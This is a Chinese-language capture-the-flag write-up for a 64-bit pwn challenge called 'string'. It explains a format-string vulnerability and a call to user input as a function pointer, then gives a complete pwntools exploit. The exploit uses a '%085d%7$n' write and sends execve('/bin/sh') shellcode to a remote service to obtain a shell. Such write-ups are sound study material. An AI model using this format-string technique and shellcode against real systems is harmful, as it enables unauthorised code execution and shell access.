NUAActf string wp

64位的格式化串还没做过，导致做了半天。

拿到题目检查下防护：

开启了canary。
简单运行看了下程序逻辑后放到IDA里：
为了方便看，部分变量名已修改：


sub_400A70这个函数里没啥问题。

输入east退出来。进入east函数：
里面有个格式化串的漏洞：

继续往下看：

关键在：

将输入的这个字符串的首地址强制转化为函数指针后调用他。
看汇编清楚点：

那这里就可以读入shellcode，然后再调用shellcode即可。
想要触发这个模块，需要

从main函数可以看到：

已经将地址给泄露出来了，只需要用格式化串漏洞，将其修改为85即可。
exp如下：

from pwn import *

#a=process("./string")

#gdb.attach(a,"b *0x0000000000400C72")

a=remote("111.198.29.45","30230")

a.recvuntil("secret[0] is ")

v3_addr=a.recvuntil("\n")

v3_addr="0x"+v3_addr[:-1]

v3_address=eval(v3_addr)

print (hex(v3_address))

a.recvuntil("What should your character's name be:\n")

a.sendline("a")

a.recvuntil("So, where you will go?east or up?:\n")

a.send("east\n")

a.recvuntil("go into there(1), or leave(0)?:\n")

a.send("1\n")

a.recvuntil("'Give me an address'\n")

a.send(str(v3_address)+"\n")

a.recvuntil("you wish is:\n")

payload="%085d%7$n"

a.sendline(payload)

a.recvuntil("Wizard: I will help you! USE YOU SPELL\n")

a.sendline("\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05")

a.interactive();